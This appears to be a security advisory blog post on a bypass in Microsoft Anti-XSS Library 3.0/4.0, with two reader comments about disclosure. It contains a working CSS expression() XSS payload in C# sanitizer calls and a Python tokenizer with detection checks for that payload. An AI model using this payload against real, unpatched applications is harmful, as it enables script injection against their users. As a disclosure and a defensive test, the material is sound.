Introduction:
Microsoft Anti-XSS Library is used to protect applications from Cross-Site Scripting attacks, by providing methods for input sanitization.
Vulnerability:
Microsoft Anti-XSS Library 3.0 and 4.0 are vulnerable to an attack in which an attacker crafts a specially formed CSS string that, after passing through the GetSafeHtml or GetSafeHtmlFragment methods, still contains a CSS expression() that Internet Explorer evaluates as JavaScript.
The following ASP.NET (C#) code demonstrates the vulnerability; the first call sanitizes a whole document, the second a fragment:
// Example 1: full document through GetSafeHtml
string safeHtml = Microsoft.Security.Application.Sanitizer.GetSafeHtml("<html>a<style><!--div{font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'}--></style><div>b</div></html>");
// Example 2: fragment with an inline style attribute through GetSafeHtmlFragment
string safeFragment = Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment("<div style=\"font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'\">aaa</div>");
The string value can be broken down as follows:
div{
font-family:Foo,Bar\,'a\a';
font-family:';color:expression(alert(1));y'
}
A bug in the Anti-XSS library causes the closing apostrophe of the quoted string in the first font-family declaration to be dropped. Because that string is no longer terminated, Internet Explorer parses the CSS differently: the second font-family value is swallowed into the first string, and color:expression(...) becomes a declaration of its own, which triggers a JavaScript call:
div{
font-family:Foo,Bar\,'a\a;font-family:';
color:expression(alert(1));
y'
}
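To make the two parses above concrete, here is an added example (not code from the advisory or from the Anti-XSS library): a minimal CSS declaration tokenizer that honours quoted strings and backslash escapes the way a browser does, run over the style body before and after the apostrophe is dropped. It also shows the output-side check a defender can apply to any sanitizer's result: flag expression( that appears outside a quoted string, and flag a string that is never closed. The two inputs are constructed from the payload on this page; BEFORE and AFTER are names chosen here.

```python
import re

# Constructed inputs: the style body from the advisory as submitted (BEFORE),
# and the same body with the closing apostrophe dropped (AFTER), which is
# what the sanitizer emits.
BEFORE = "font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'"
AFTER = "font-family:Foo,Bar\\,'a\\a;font-family:';color:expression(alert(1));y'"


def split_declarations(body):
    """Split 'prop:val;prop:val' into raw declaration strings.
    A ';' inside a quoted string, or right after a backslash, is literal,
    as in a browser tokenizer. An unterminated string runs to end of input."""
    decls, buf, quote, i = [], [], None, 0
    while i < len(body):
        ch = body[i]
        if ch == "\\" and i + 1 < len(body):  # backslash escape, in or out of a string
            buf.append(ch + body[i + 1])
            i += 2
            continue
        if quote:  # inside a string: everything is literal until the matching quote
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            buf.append(ch)
        elif ch == ";":
            decls.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
        i += 1
    if "".join(buf).strip():
        decls.append("".join(buf))
    return decls


def parse(body):
    """Return [(property, value)] pairs; a declaration with no ':' gets an empty value."""
    out = []
    for decl in split_declarations(body):
        prop, _, val = decl.partition(":")
        out.append((prop.strip().lower(), val.strip()))
    return out


# A properly closed single- or double-quoted CSS string, escapes included.
_STRING = re.compile(r"'(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\"")


def unsafe_declarations(body):
    """Output-side check: property names whose value, with closed quoted
    strings removed, still contains IE's expression( construct. Text inside
    a closed string is inert, so only code outside strings counts."""
    hits = []
    for prop, val in parse(body):
        bare = _STRING.sub("", val)
        if re.search(r"expression\s*\(", bare, re.I):
            hits.append(prop)
    return hits


def has_unterminated_string(body):
    """True when a quote opened in the body is never closed: exactly the
    malformation the advisory describes, and a sign the sanitizer mangled
    its input rather than neutralising it."""
    quote, i = None, 0
    while i < len(body):
        ch = body[i]
        if ch == "\\":
            i += 2
            continue
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        i += 1
    return quote is not None


if __name__ == "__main__":
    for label, body in (("BEFORE", BEFORE), ("AFTER", AFTER)):
        print(label, parse(body))
        print("  expression() outside strings in:", unsafe_declarations(body))
        print("  unterminated string:", has_unterminated_string(body))
```

Run as written, BEFORE parses to two font-family declarations and passes both checks; AFTER parses to font-family, color and a dangling y', with color carrying expression(alert(1)) and an unclosed string. The lesson for anyone wrapping a sanitizer is that its output deserves the same scrutiny as its input: a sanitizer that rewrites CSS must keep string literals balanced, and a post-condition test like the two checks here would have caught this bug before it shipped.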
Impact:
Every application that relies on either GetSafeHtml or GetSafeHtmlFragment to sanitize user-supplied data is vulnerable to XSS.
Remediation:
Microsoft has issued Anti-XSS Library 4.2 to address this issue.
References:
http://www.securityfocus.com/bid/51291
http://technet.microsoft.com/en-us/security/bulletin/ms12-007
Discovered by - Adi Cohen, IBM Application Security Research
The blog post seems more to be about spreading FUD about Microsoft than actually addressing the issue. You blog about a known security flaw that has already been patched nearly 2 weeks ago.
http://technet.microsoft.com/en-us/security/bulletin/ms12-007
Microsoft has clearly already published this issue along with the 4.2 version of Anti-XSS that closes this security vulnerability.
Where is your link to the fix?
Posted by: Dotnetchris | January 20, 2012 at 04:20 PM
@Dotnetchris - have you bothered to look in the "Acknowledgments" section of the Microsoft security bulletin? It was *our team* that disclosed this to Microsoft. We then waited for Microsoft to patch this issue, and only then published the full details of the issue. That's called responsible disclosure. There's no FUD here, just technical details.
Posted by: AppSecInsider | February 26, 2012 at 10:02 AM